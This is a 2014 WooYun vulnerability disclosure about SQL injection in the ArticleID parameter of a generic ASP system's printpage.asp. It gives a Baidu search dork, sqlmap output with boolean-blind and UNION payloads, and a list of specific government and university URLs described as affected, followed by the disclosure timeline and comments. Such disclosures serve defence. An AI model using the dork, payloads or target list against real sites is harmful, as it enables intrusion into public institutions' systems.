当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074884

漏洞标题:某通用系统sql注入(影响大量学校、政府站点)

相关厂商:某通用系统

漏洞作者: xyang

提交时间:2014-09-04 12:33

修复时间:2014-12-03 12:34

公开时间:2014-12-03 12:34

漏洞类型:

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开

简要描述:

sql注入漏洞,影响大量学校及政府站点

详细说明:

baidu inurl:/printpage.asp?ArticleID


baidu.jpg


GET parameter 'ArticleID' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] 
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Place: GET
Parameter: ArticleID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ArticleID=2517 AND 7499=7499
    Type: UNION query
    Title: Generic UNION query (NULL) - 28 columns
    Payload: ArticleID=-2851 UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(97)&CHR(118)
&CHR(119)&CHR(113)&CHR(76)&CHR(97)&CHR(76)&CHR(98)&CHR(106)&CHR(122)&CHR(73)&CHR(68)&CHR(72)
&CHR(119)&CHR(113)&CHR(105)&CHR(111)&CHR(98)&CHR
(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM 
MSysAccessObjects%16
---


测试了一部分站点

http://jiaojing.zkga.gov.cn/wscgs/printpage.asp?ArticleID=2517 周口市公安交警信息网
http://www.rzqzgz.gov.cn/printpage.asp?ArticleID=242 日照市委市政府信访局
http://xxjsq.qzkc.gov.cn/printpage.asp?id=60317&ArticleID=571 衢州柯城区府山街道县学街社区 
http://www.gzmzw.gov.cn/printpage.asp?ArticleID=1286 赣州民政网
http://www.qxldj.gov.cn/printpage.asp?ArticleID=1122 迁西县人力资源和社会保障局
http://www.yichang.jcy.gov.cn/printpage.asp?ArticleID=888 宜昌市人民检察院
http://www.dag.zjut.edu.cn/Article/printpage.asp?ArticleID=29 浙江工业大学档案馆
http://lib.hbu.edu.cn/web2/printpage.asp?ArticleID=291 河北大学图书馆
http://pth.njfu.edu.cn/printpage.asp?ArticleID=188 南京林业大学语言文字网
http://www.lit.edu.cn/news/printpage.asp?ArticleID=8321 洛阳理工学院
......

漏洞证明:

0E0T9C)2$FB333D%]70EKIV.jpg

6@`8D[J1E8}2H67MAGP2W32.jpg

jiaojing.jpg

修复方案:

问题处在打印页面,参数增加过滤处理。。。

版权声明:转载请注明来源 xyang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-09-09 08:51

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-03 14:19 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    我觉得这是动易的

  2. 2014-12-03 22:16 | r41n ( 路人 | Rank:5 漏洞数:2 | 专业崩爆米花。)

    这个貌似很久很久了吧。。。

  3. 2014-12-03 22:23 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @r41n http://www.cnhonkerarmy.com/thread-160827-1-1.html 果然很久了

  4. 2014-12-03 23:00 | r41n ( 路人 | Rank:5 漏洞数:2 | 专业崩爆米花。)

    @U神 14 rank 好轻松。。。

  5. 2014-12-04 01:46 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    @U神 @r41n 汗!原来早就爆出来了,不过好像出漏洞的地方不一样啊